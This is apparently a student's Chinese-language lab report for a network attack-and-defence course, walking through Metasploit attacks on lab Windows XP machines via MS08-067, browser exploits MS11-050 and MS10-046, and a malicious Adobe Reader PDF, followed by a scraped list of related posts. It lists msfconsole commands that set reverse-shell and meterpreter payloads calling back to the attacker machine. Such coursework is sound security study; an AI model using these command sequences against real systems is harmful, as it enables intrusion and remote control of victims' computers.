20165308『网络对抗技术』Exp5 MSF基础应用

一、原理与实践说明

实践内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

一个主动攻击实践,如ms08-067; (1分)

一个针对浏览器的攻击,如ms11-050;(1分)

一个针对客户端的攻击,如Adobe;(1分)

成功应用任何一个辅助模块。(0.5分)

以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。

实践内容

目录
主动攻击:ms08_067漏洞攻击
对浏览器攻击:ms10_046漏洞攻击
对Adobe的漏洞攻击:adobe_toolbutton
尝试利用漏洞对win7系统进行攻击

Windows服务渗透攻击——MS08-067安全漏洞

攻击机:Kali(IP地址:192.168.91.135)

靶机: windows XP(IP地址:192.168.91.134)

在攻击机kali输入 msfconsole 进入控制台,依次输入以下指令:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > show payloads
msf exploit(windows/smb/ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连
msf exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.91.135 //攻击机ip
msf exploit(windows/smb/ms08_067_netapi) > set LPORT 5308 //攻击端口
msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.91.134 //靶机ip,特定漏洞端口已经固定
msf exploit(windows/smb/ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高
msf exploit(windows/smb/ms08_067_netapi) > exploit //攻击



建立会话,攻击成功结果如下:



针对浏览器的攻击:ms11_050

攻击机:kali (IP地址:192.168.91.135)

靶机:WindowsXP (IP地址:192.168.91.136)

在攻击机kali输入 msfconsole 进入控制台,依次输入以下指令:

msf > use windows/browser/ms11_050_mshtml_cobjectelement

info指令查看该模块的信息

targets信息

options信息

msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_tcp //http反向回连
msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.91.135 //攻击机ip
msf exploit(ms11_050_cobjectelement) > set LPORT 5308 //攻击端口固定
msf exploit(ms11_050_cobjectelement) > set URIPATH baidu //统一资源标识符路径设置
set target 1
msf exploit(ms11_050_cobjectelement) > exploit

攻击成功后会有靶机需要访问的网址

一直回连不成功,失败。所以机智地换了一个。

对浏览器攻击:ms10_046漏洞攻击

用 use exploit/windows/browser/ms10_046_shortcut_icon_dllloader 使用该模块,再使用 show payloads 查看可以供我们使用的payload:

SRVHOST填的是本地监听主机的IP地址,LHOST也是监听的IP地址,所以这里SRVHOST和LHOST都应该填攻击机的IP地址:

使用exploit指令执行漏洞,可以看到生成了一个url:

使用exploit指令执行漏洞,可以看到生成了一个url:

在MSF终端看见漏洞执行成功:

针对Adobe Reader软件的渗透攻击——adobe_toolbutton

攻击机:kali

靶机:windowsXP

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

先用search adobe得知此漏洞所在的模块

选择一个模块



用show targets查看可以被攻击的靶机的操作系统型号

msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回连
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.91.135 //攻击机ip
msf exploit(adobe_cooltype_sing) > set LPORT 5308//攻击端口
msf exploit(adobe_cooltype_sing) > set FILENAME 5308zsy.pdf //设置生成pdf文件的名字
msf exploit(adobe_cooltype_sing) > exploit//攻击

找到5308zsy.pdf文件

将文件放到靶机上

在kali上进入监听模块,输入以下命令:

msf > use exploit/multi/handler //进入监听模块
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp//tcp反向连接
msf exploit(handler) > set LHOST 192.168.91.135 //攻击机ip
msf exploit(handler) > set LPORT 5308 //攻击端口固定
msf exploit(handler) > exploit

发现已经获取了被攻击者权力,可以对其进行操作

若关闭pdf文件,则失去权限,攻击失败

成功应用任何一个辅助模块(唯一)

输入命令show auxiliary查看所有辅助模块

选择其中一个即可

用指令info查看相关信息

进行扫描,结果如下图所示

实验感想

本次实验通过通过MSF的攻击模块对计算机进行各种攻击方法的实践,攻击的方法更深入。总是会有攻击不成功的地方,但是课上老师说不成功是很正常的事情,所以不会太崩溃。但是有些问题还是不能自己解决,还是要靠别人的帮助才能完成。

基础问题回答

用自己的话解释什么是exploit,payload,encode?

exploit:就是漏洞利用。有漏洞不一定就有Exploit但是有Exploit就肯定有漏洞。

payload:可以实现任何运行在受害者环境中的程序所能做的事情,并且能够执行动作包括破坏文件删除文件,向病毒的作者或者任意的接收者发送敏感信息,以及提供通向被感染计算机的后门。说白了就是传送到靶机上的用来攻击的恶意代码。

encode:编码,就是把代码重新包装一下让它尽量躲避查杀。

20165308『网络对抗技术』Exp5 MSF基础应用的更多相关文章

  1. 20155308『网络对抗技术』Exp5 MSF基础应用

    20155308『网络对抗技术』Exp5 MSF基础应用 一.原理与实践说明 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实 ...

  2. 2017-2018-2 20155303『网络对抗技术』Exp5:MSF基础应用

    2017-2018-2 20155303『网络对抗技术』Exp5:MSF基础应用 --------CONTENTS-------- 一.原理与实践说明 1.实践内容 2.预备知识 3.基础问题 二.实 ...

  3. 2017-2018-2 20155310『网络对抗技术』Exp5:MSF基础应用

    2017-2018-2 20155310『网络对抗技术』Exp5:MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:由攻击者或渗透测试者利 ...

  4. # 2017-2018-2 20155319『网络对抗技术』Exp5:MSF基础应用

    2017-2018-2 20155319『网络对抗技术』Exp5:MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:使用者利用漏洞进行攻击 ...

  5. 2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用

    2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:使用者利用漏洞进行攻击 ...

  6. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  7. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  8. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

  9. 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...

随机推荐

  1. DevExpress v18.2新版亮点——Reporting篇(二)

    行业领先的.NET界面控件——DevExpress v18.2日前正式发布,本站将以连载的形式为大家介绍新版本新功能.本文将介绍了DevExpress Reporting v18.2 的新功能,新版3 ...

  2. Problem 6: Sum square difference

    The sum of the squares of the first ten natural numbers is, 12 + 22 + ... + 102 = 385 The square of ...

  3. java虚拟机——垃圾回收机制

    问题1:什么是垃圾回收机制? 在java的虚拟机当中,在我们进行实例化的时候,堆会给我们开辟新的空间存放实例.而由于堆,方法区是线程公有,不会像栈区(线程私有)一样随着线程的销毁而销毁.因此在java ...

  4. js的观察者模式

    观察者模式(发布-订阅模式):它定义对象间一种一对多的依赖关系,当一个对象的状态发生改变时,所有依赖于它的对象都将得到通知.由主体和观察者组成,主体负责发布事件,同时观察者通过订阅这些事件来观察该主体 ...

  5. Dangerous well

    Firsttime to develop games throuth Unity3d, such a great platform! You can build your games more qui ...

  6. WordCount(java)

    github项目链接 https://gitee.com/huwenli/Wc.git 1.项目简介 WordCount的需求可以概括为:对程序设计语言源文件统计字符数.单词数.行数,统计结果以指定格 ...

  7. 巧用std::shared_ptr全局对象释放单例内存

    巧用std::shared_ptr 单例的使用相对比较广泛,但是需要在程序退出前调用它的析构函数对数据进行释放,常规做法是在main函数末尾进行释放工作, 但是这样相对比较繁琐,因此便有了利用全局变量 ...

  8. django学习系列——python和php对比

    python 和 php 我都是使用过,这里不想做一个非常理性的分析,只是根据自己的经验谈一下感想. 在web开发方面,无疑 php 更甚一筹. 从某种角度来说,php 就是专门为 web 定制的语言 ...

  9. Where do I belong (freeCodeCamp)

    先给数组排序,然后找到指定的值在数组的位置,最后返回位置对应的索引. 举例:where([1,2,3,4], 1.5) 应该返回 1.因为1.5插入到数组[1,2,3,4]后变成[1,1.5,2,3, ...

  10. SAMTOOLS使用 SAM BAM文件处理

    [怪毛匠子 整理] samtools学习及使用范例,以及官方文档详解 #第一步:把sam文件转换成bam文件,我们得到map.bam文件 system"samtools view -bS m ...